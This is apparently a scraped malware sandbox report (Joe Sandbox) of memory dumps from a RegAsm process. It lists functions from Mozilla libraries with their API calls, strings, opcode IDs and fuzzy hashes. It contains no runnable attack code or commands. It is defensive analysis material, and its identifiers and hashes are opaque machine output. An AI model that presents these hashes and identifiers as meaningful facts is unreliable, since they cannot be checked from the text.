Associated: 00000004.00000002.2413390971.000000006CE5F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413523450.000000006CE9E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413549858.000000006CE9F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413572139.000000006CEA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413587501.000000006CEA5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ccc0000_RegAsm.jbxd

Similarity

API ID: K11_$FreeItem_Util$memcpy$AllocZfreehtonl$DeriveErrorWith
String ID:
API String ID: 1510409361-0
Opcode ID: 2fb3220070c75ba8c3c347abf9d420fe78ceb5089adea4bfdc6548cd4e5ca77c
Instruction ID: 4ea3574e66d821aa29628b80c105c74b85136b111089ebc8b3f5c6b97a5245b8
Opcode Fuzzy Hash: 2fb3220070c75ba8c3c347abf9d420fe78ceb5089adea4bfdc6548cd4e5ca77c
Instruction Fuzzy Hash: 7571CDB5A00205DFDB24CFA5CC94A6AF7B0BF48318F14862DE90D9B761E731E954CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6CC24EA0 Relevance: 16.2, APIs: 8, Strings: 1, Instructions: 408sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(000007D0), ref: 6CC24EFF
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CC24F2E
moz_xmalloc.MOZGLUE ref: 6CC24F52
memset.VCRUNTIME140(00000000,00000000), ref: 6CC24F62
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CC252B2
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CC252E6
Sleep.KERNEL32(00000010), ref: 6CC25481
free.MOZGLUE(?), ref: 6CC25498

Strings

(, xrefs: 6CC25250

Memory Dump Source

Source File: 00000004.00000002.2412300207.000000006CBC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CBC0000, based on PE: true

Associated: 00000004.00000002.2412272729.000000006CBC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412533246.000000006CC3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412586168.000000006CC4E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412609993.000000006CC52000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cbc0000_RegAsm.jbxd

Similarity

API ID: floor$Sleep$freememsetmoz_xmalloc
String ID: (
API String ID: 4104871533-3887548279
Opcode ID: c28a9850b8a9c42d44a5ed9cc77b9845626f1d8f48d5293a54a332ceed536082
Instruction ID: 543feb1b111c7f09819b579a4ab02d183a9da9153113eb06eeec0a82e43a1382
Opcode Fuzzy Hash: c28a9850b8a9c42d44a5ed9cc77b9845626f1d8f48d5293a54a332ceed536082
Instruction Fuzzy Hash: 77F1C371A18B408FC716DF39C85062BB7F5AFD6284F05C72EF84AA7651EB31D8468B81

Uniqueness

Uniqueness Score: -1.00%

Function 6CCD0FE0 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 227COMMON

Download Yara Rule

APIs

Part of subcall function 6CCCCA30: EnterCriticalSection.KERNEL32(?,?,?,6CD2F9C9,?,6CD2F4DA,6CD2F9C9,?,?,6CCF369A), ref: 6CCCCA7A
Part of subcall function 6CCCCA30: LeaveCriticalSection.KERNEL32(?), ref: 6CCCCB26

memset.VCRUNTIME140(00000000,00000000,00000C0A), ref: 6CCD103E
EnterCriticalSection.KERNEL32(?), ref: 6CCD1139
LeaveCriticalSection.KERNEL32(?), ref: 6CCD1190
sqlite3_free.NSS3(00000000), ref: 6CCD1227
sqlite3_log.NSS3(0000001B,delayed %dms for lock/sharing conflict at line %d,00000001,0000BCFE), ref: 6CCD126E
sqlite3_free.NSS3(?), ref: 6CCD127F

Strings

Pl, xrefs: 6CCD109E
winAccess, xrefs: 6CCD129B
delayed %dms for lock/sharing conflict at line %d, xrefs: 6CCD1267

Memory Dump Source

Source File: 00000004.00000002.2412659173.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true

Associated: 00000004.00000002.2412639409.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413390971.000000006CE5F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413523450.000000006CE9E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413549858.000000006CE9F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413572139.000000006CEA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413587501.000000006CEA5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ccc0000_RegAsm.jbxd

Similarity

API ID: CriticalSection$EnterLeavesqlite3_free$memsetsqlite3_log
String ID: Pl$delayed %dms for lock/sharing conflict at line %d$winAccess
API String ID: 2733752649-2616037383
Opcode ID: 87ade8e69c6f74e7fa6a84b36fc0b1382a5e81ee61326df422584c57c3f7afc7
Instruction ID: 0ef9efc381e60d19edf5cdf82848ff0b53d006f5329d6fdd52bd3de202f59c61
Opcode Fuzzy Hash: 87ade8e69c6f74e7fa6a84b36fc0b1382a5e81ee61326df422584c57c3f7afc7
Instruction Fuzzy Hash: 6471EE327056019FDB049F69EC85A5E3376FB86334F16022AEA12C7A90FB31E941C793

Uniqueness

Uniqueness Score: -1.00%

Function 6CD96C00 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 190memorytimeCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6CD41C6F,00000000,00000004,?,?), ref: 6CD96C3F

Part of subcall function 6CDEC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CDEC2BF

PORT_ArenaAlloc_Util.NSS3(?,0000000D,?,?,00000000,00000000,00000000,?,6CD41C6F,00000000,00000004,?,?), ref: 6CD96C60
PR_ExplodeTime.NSS3(00000000,6CD41C6F,?,?,?,?,?,00000000,00000000,00000000,?,6CD41C6F,00000000,00000004,?,?), ref: 6CD96C94

Strings

gfff, xrefs: 6CD96D9C
gfff, xrefs: 6CD96D66
gfff, xrefs: 6CD96D30
gfff, xrefs: 6CD96CF5
gfff, xrefs: 6CD96CFD

Memory Dump Source

Source File: 00000004.00000002.2412659173.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true

Associated: 00000004.00000002.2412639409.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413390971.000000006CE5F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413523450.000000006CE9E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413549858.000000006CE9F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413572139.000000006CEA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413587501.000000006CEA5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ccc0000_RegAsm.jbxd

Similarity

API ID: Alloc_ArenaErrorExplodeTimeUtilValue
String ID: gfff$gfff$gfff$gfff$gfff
API String ID: 3534712800-180463219
Opcode ID: ba357578e32fe4e54ccbf729ec0c6a44c31bdc1d6ec19a848bb906c526a7903d
Instruction ID: 1e05d2a635afca1f0d5ebf3d93e4a9ece380b4bdc54894bd3f12d153b2e14221
Opcode Fuzzy Hash: ba357578e32fe4e54ccbf729ec0c6a44c31bdc1d6ec19a848bb906c526a7903d
Instruction Fuzzy Hash: 8B513C76B015494FC708CEADDC526DEBBDAABA4310F48C23AE442DB781E638D907C751

Uniqueness

Uniqueness Score: -1.00%

Function 6CE18FB0 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 289COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CE18FEE
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CE190DC
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CE19118
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CE1915C
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CE191C2
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CE19209

Strings

UUUU, xrefs: 6CE19255
3333, xrefs: 6CE1925E

Memory Dump Source

Source File: 00000004.00000002.2412659173.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true

Associated: 00000004.00000002.2412639409.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413390971.000000006CE5F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413523450.000000006CE9E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413549858.000000006CE9F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413572139.000000006CEA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413587501.000000006CEA5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ccc0000_RegAsm.jbxd

Similarity

API ID: _byteswap_ulong$Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: 3333$UUUU
API String ID: 1967222509-2679824526
Opcode ID: 999c9ae406f86c6996f9f4c35f7a6988430449be89c37321ee41ae6dc64c0985
Instruction ID: ba316c179227ea4c1d1cbaf8bc54a5e85d6221514020c61dc58fedf010627a6c
Opcode Fuzzy Hash: 999c9ae406f86c6996f9f4c35f7a6988430449be89c37321ee41ae6dc64c0985
Instruction Fuzzy Hash: B5A1A072E001159FDB04CB69CC81B9EB7B5BF88328F1A4179D905A7781E736EC11CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6CE58D20 Relevance: 12.7, APIs: 6, Strings: 1, Instructions: 471threadnetworkCOMMON

Download Yara Rule

APIs

PR_CallOnce.NSS3(6CEA14E4,6CE0CC70), ref: 6CE58D47
PR_GetCurrentThread.NSS3 ref: 6CE58D98

Part of subcall function 6CD30F00: PR_GetPageSize.NSS3(6CD30936,FFFFE8AE,?,6CCC16B7,00000000,?,6CD30936,00000000,?,6CCC204A), ref: 6CD30F1B
Part of subcall function 6CD30F00: PR_NewLogModule.NSS3(clock,6CD30936,FFFFE8AE,?,6CCC16B7,00000000,?,6CD30936,00000000,?,6CCC204A), ref: 6CD30F25

PR_snprintf.NSS3(?,?,%u.%u.%u.%u,?,?,?,?), ref: 6CE58E7B
htons.WSOCK32(?), ref: 6CE58EDB
PR_GetCurrentThread.NSS3 ref: 6CE58F99
PR_GetCurrentThread.NSS3 ref: 6CE5910A

Strings

%u.%u.%u.%u, xrefs: 6CE58E74

Memory Dump Source

Source File: 00000004.00000002.2412659173.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true

Associated: 00000004.00000002.2412639409.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413390971.000000006CE5F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413523450.000000006CE9E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413549858.000000006CE9F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413572139.000000006CEA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413587501.000000006CEA5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ccc0000_RegAsm.jbxd

Similarity

API ID: CurrentThread$CallModuleOncePageR_snprintfSizehtons
String ID: %u.%u.%u.%u
API String ID: 1845059423-1542503432
Opcode ID: e3bc175af741ca66f252ae0781b48a9cfa4fa2a277b5730db179e340c18ef4be
Instruction ID: 8c15b5f8adfeeed7fafb2304177238e1a5c15a3a93f67947de782fbef83727b4
Opcode Fuzzy Hash: e3bc175af741ca66f252ae0781b48a9cfa4fa2a277b5730db179e340c18ef4be
Instruction Fuzzy Hash: 6802AD72A061658FDB148F19C4583A67BB3EF43308FAA825EC8515FB91C333D956C791

Uniqueness

Uniqueness Score: -1.00%

Function 6CC12C10 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 228stringCOMMON

Download Yara Rule

APIs

?EcmaScriptConverter@DoubleToStringConverter@double_conversion@@SAABV12@XZ.MOZGLUE ref: 6CC12C31
?ToShortestIeeeNumber@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@W4DtoaMode@12@@Z.MOZGLUE ref: 6CC12C61

Part of subcall function 6CBC4DE0: ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6CBC4E5A
Part of subcall function 6CBC4DE0: ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6CBC4E97

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6CC12C82
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6CC12E2D

Part of subcall function 6CBD81B0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,00000000,?,ProfileBuffer parse error: %s,expected a ProfilerOverheadDuration entry after ProfilerOverheadTime), ref: 6CBD81DE

Strings

(root), xrefs: 6CC1354F
ProfileBuffer parse error: %s, xrefs: 6CC12E3B
expected a Time entry, xrefs: 6CC12E36

Memory Dump Source

Source File: 00000004.00000002.2412300207.000000006CBC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CBC0000, based on PE: true

Associated: 00000004.00000002.2412272729.000000006CBC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412533246.000000006CC3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412586168.000000006CC4E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412609993.000000006CC52000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cbc0000_RegAsm.jbxd

Similarity

API ID: String$Double$Converter@double_conversion@@$Dtoa$Ascii@Builder@2@Builder@2@@Converter@CreateDecimalEcmaIeeeMode@12@Mode@12@@Number@Representation@ScriptShortestV12@__acrt_iob_func__stdio_common_vfprintfstrlen
String ID: (root)$ProfileBuffer parse error: %s$expected a Time entry
API String ID: 801438305-4149320968
Opcode ID: 903b425049e9ab1b5316992ad383107b0da754da089b398c17290af86ee6b040
Instruction ID: 22827840f26afe904703b61b6f1e92af40bc37432df94bd6f68f7ca94338d388
Opcode Fuzzy Hash: 903b425049e9ab1b5316992ad383107b0da754da089b398c17290af86ee6b040
Instruction Fuzzy Hash: C591D0B460C3808FD724DF26C49469FB7F1AF8A358F10891DE59A8BB50EB30D949CB42

Uniqueness

Uniqueness Score: -1.00%

Function 6CC29E30 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 347COMMON

Download Yara Rule

APIs

__aullrem.LIBCMT ref: 6CC29F3D
__aulldiv.LIBCMT ref: 6CC29F77
__aullrem.LIBCMT ref: 6CC29F8C
__aulldiv.LIBCMT ref: 6CC2A023

Strings

NaN, xrefs: 6CC29EAB
-Infinity, xrefs: 6CC29E60, 6CC29E7B

Memory Dump Source

Source File: 00000004.00000002.2412300207.000000006CBC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CBC0000, based on PE: true

Associated: 00000004.00000002.2412272729.000000006CBC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412533246.000000006CC3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412586168.000000006CC4E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412609993.000000006CC52000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cbc0000_RegAsm.jbxd

Similarity

API ID: __aulldiv__aullrem
String ID: -Infinity$NaN
API String ID: 3839614884-2141177498
Opcode ID: 67364545d89def2ec63fdbfb61e2df12b543e0d2195b5ebc8aabc68c9dde3e1a
Instruction ID: 946c494ac05274aacaaf7bce390908a199d2b54557727d6e354461e1b5d5511c
Opcode Fuzzy Hash: 67364545d89def2ec63fdbfb61e2df12b543e0d2195b5ebc8aabc68c9dde3e1a
Instruction Fuzzy Hash: 2DC18F31E00319CFDB14CFA9C8507AEB7B6FB84714F144529D416ABB80EB79A94ACB91

Uniqueness

Uniqueness Score: -1.00%

Function 6CE5CDC0 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 423stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CE5D086
PR_Malloc.NSS3(00000001), ref: 6CE5D0B9
PR_Free.NSS3(?), ref: 6CE5D138

Strings

>, xrefs: 6CE5CF5B

Memory Dump Source

Source File: 00000004.00000002.2412659173.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true

Associated: 00000004.00000002.2412639409.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413390971.000000006CE5F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413523450.000000006CE9E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413549858.000000006CE9F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413572139.000000006CEA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413587501.000000006CEA5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ccc0000_RegAsm.jbxd

Similarity

API ID: FreeMallocstrlen
String ID: >
API String ID: 1782319670-325317158
Opcode ID: 33f3c904727b78e6a3ccadd60312c31edcb67202b830285271c06c35c0548f6e
Instruction ID: 3f7d0b82c2b49706f8c6826a8d0769798355d4058dfffa863d217005f0e3f3c8
Opcode Fuzzy Hash: 33f3c904727b78e6a3ccadd60312c31edcb67202b830285271c06c35c0548f6e
Instruction Fuzzy Hash: DED15A2BB415460BEB14487D8AB13EA77B38747378FF80329D1219BBE5E61B8963C351

Uniqueness

Uniqueness Score: -1.00%

Function 6CC3545C Relevance: 6.6, APIs: 5, Instructions: 305COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,000000FF,?), ref: 6CC38A4B

Memory Dump Source

Source File: 00000004.00000002.2412300207.000000006CBC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CBC0000, based on PE: true

Associated: 00000004.00000002.2412272729.000000006CBC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412533246.000000006CC3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412586168.000000006CC4E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412609993.000000006CC52000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cbc0000_RegAsm.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 83bd3679e087d2f8c0a363543460151d132c5b050c0c1d93b1d77d16f48f2b37
Instruction ID: 78cad70dbaff45e4983037591adf7eb838b17a55725311f0ebadb0b358791834
Opcode Fuzzy Hash: 83bd3679e087d2f8c0a363543460151d132c5b050c0c1d93b1d77d16f48f2b37
Instruction Fuzzy Hash: 83B1C772A0022A8FDB14CF68DC90BD9B7B2FF85314F1512AAC54DDB795E730A985CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6CC3542B Relevance: 6.5, APIs: 5, Instructions: 287COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,000000FF,?), ref: 6CC388F0
memset.VCRUNTIME140(?,000000FF,?,?), ref: 6CC3925C

Memory Dump Source

Source File: 00000004.00000002.2412300207.000000006CBC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CBC0000, based on PE: true

Associated: 00000004.00000002.2412272729.000000006CBC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412533246.000000006CC3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412586168.000000006CC4E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412609993.000000006CC52000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cbc0000_RegAsm.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
Instruction ID: 90e707457ee254e14b5bab787c173aab08d1a00cee6a8026f7076934baae02d0
Opcode Fuzzy Hash: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
Instruction Fuzzy Hash: 11B1D672E0421A8FCB14CF58DC81AEDB7B2EF85314F14126AC549DBB85E730A989CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6CC350C7 Relevance: 6.5, APIs: 5, Instructions: 280COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,000000FF,80808082), ref: 6CC38E18
memset.VCRUNTIME140(?,000000FF,?,?), ref: 6CC3925C

Memory Dump Source

Source File: 00000004.00000002.2412300207.000000006CBC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CBC0000, based on PE: true

Associated: 00000004.00000002.2412272729.000000006CBC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412533246.000000006CC3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412586168.000000006CC4E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412609993.000000006CC52000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cbc0000_RegAsm.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 8a04f876341ba59a6ddb8d2d2d5789db075aee54b4cc3de998e3f034435ba008
Instruction ID: 18bf6090d9fbace91fc43d8b90ee6124f57a2c5794f5b747f6a2e69d1c1ec77e
Opcode Fuzzy Hash: 8a04f876341ba59a6ddb8d2d2d5789db075aee54b4cc3de998e3f034435ba008
Instruction Fuzzy Hash: E4A1C872A001268FCB14CF58DC90BDDB7B2AF85314F1502BAC94DDBB85E731A999CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6CDFAD50 Relevance: 6.4, APIs: 4, Instructions: 389COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2412659173.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true

Associated: 00000004.00000002.2412639409.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413390971.000000006CE5F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413523450.000000006CE9E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413549858.000000006CE9F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413572139.000000006CEA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413587501.000000006CEA5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ccc0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c30665d0fe60075349aa114b1018008074db541bec2b6e372b3f5598252129f2
Instruction ID: 4663844a926db8cd5c41e03c0e958bbb8e93089e8399745f8bbec36aece9ebd1
Opcode Fuzzy Hash: c30665d0fe60075349aa114b1018008074db541bec2b6e372b3f5598252129f2
Instruction Fuzzy Hash: 6CF1DF71E01611CFDB04CFA8D9403AE77F1BB8A308F16422ADA15D7BA4E7749996CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 6CC177A0 Relevance: 6.3, APIs: 4, Instructions: 291timeCOMMON

Download Yara Rule

APIs

?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6CC17A81
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6CC17A93

Part of subcall function 6CBE5C50: GetTickCount64.KERNEL32 ref: 6CBE5D40
Part of subcall function 6CBE5C50: EnterCriticalSection.KERNEL32(6CC4F688), ref: 6CBE5D67

??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6CC17AA1

Part of subcall function 6CBE5C50: __aulldiv.LIBCMT ref: 6CBE5DB4
Part of subcall function 6CBE5C50: LeaveCriticalSection.KERNEL32(6CC4F688), ref: 6CBE5DED

?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(FFFFFFFE,?,?,?), ref: 6CC17B31

Memory Dump Source

Source File: 00000004.00000002.2412300207.000000006CBC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CBC0000, based on PE: true

Associated: 00000004.00000002.2412272729.000000006CBC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412533246.000000006CC3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412586168.000000006CC4E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412609993.000000006CC52000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cbc0000_RegAsm.jbxd

Similarity

API ID: Time$CriticalSectionStampV01@@Value@mozilla@@$BaseCount64DurationEnterLeaveNow@PlatformSeconds@Stamp@mozilla@@TickUtils@mozilla@@V12@___aulldiv
String ID:
API String ID: 4054851604-0
Opcode ID: 325ec6cb3c7e395e008f4b9b9915e87ef9aca2e2148587108fb849abc91e919c
Instruction ID: 6c58d920da93005b981c639e9119685340273b41b5c890d34f7e8b05d058ff7f
Opcode Fuzzy Hash: 325ec6cb3c7e395e008f4b9b9915e87ef9aca2e2148587108fb849abc91e919c
Instruction Fuzzy Hash: 7AB1923560C3818BDB14CF26C45065FB7E2BFC5318F158A1CE99567B91EB70E90AEB82

Uniqueness

Uniqueness Score: -1.00%

Function 6CC2B700 Relevance: 4.5, APIs: 3, Instructions: 41nativeCOMMON

Download Yara Rule

APIs

NtQueryVirtualMemory.NTDLL ref: 6CC2B720
RtlNtStatusToDosError.NTDLL ref: 6CC2B75A
RtlSetLastWin32Error.NTDLL(00000000,00000000,000000FF,00000000,00000000,?,0000001C,6CBFFE3F,00000000,00000000,?,?,00000000,?,6CBFFE3F), ref: 6CC2B760

Memory Dump Source

Source File: 00000004.00000002.2412300207.000000006CBC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CBC0000, based on PE: true

Associated: 00000004.00000002.2412272729.000000006CBC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412533246.000000006CC3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412586168.000000006CC4E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412609993.000000006CC52000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cbc0000_RegAsm.jbxd

Similarity

API ID: Error$LastMemoryQueryStatusVirtualWin32
String ID:
API String ID: 304294125-0
Opcode ID: 5a36048f9310118a7f186621497950175a01fade8622141fe32f8f193bf83ccf
Instruction ID: ca406d1a7fcb473552c0cd295626fed70b518619dd8f38706f9dfb8c5669a8f1
Opcode Fuzzy Hash: 5a36048f9310118a7f186621497950175a01fade8622141fe32f8f193bf83ccf
Instruction Fuzzy Hash: 2FF0C87094021CAEDF019AA1DC94BDFB7BC9B0471DF106229D516A15C0E7B895CCD670

Uniqueness

Uniqueness Score: -1.00%

Function 6CC2B8C0 Relevance: 3.1, APIs: 2, Instructions: 118nativeCOMMON

Download Yara Rule

APIs

rand_s.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6CBD03D4,?), ref: 6CC2B955
NtQueryVirtualMemory.NTDLL ref: 6CC2B9A5

Memory Dump Source

Source File: 00000004.00000002.2412300207.000000006CBC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CBC0000, based on PE: true

Associated: 00000004.00000002.2412272729.000000006CBC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412533246.000000006CC3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412586168.000000006CC4E000.00000004.00000001.01000000.0000000A.sdmpDownload File
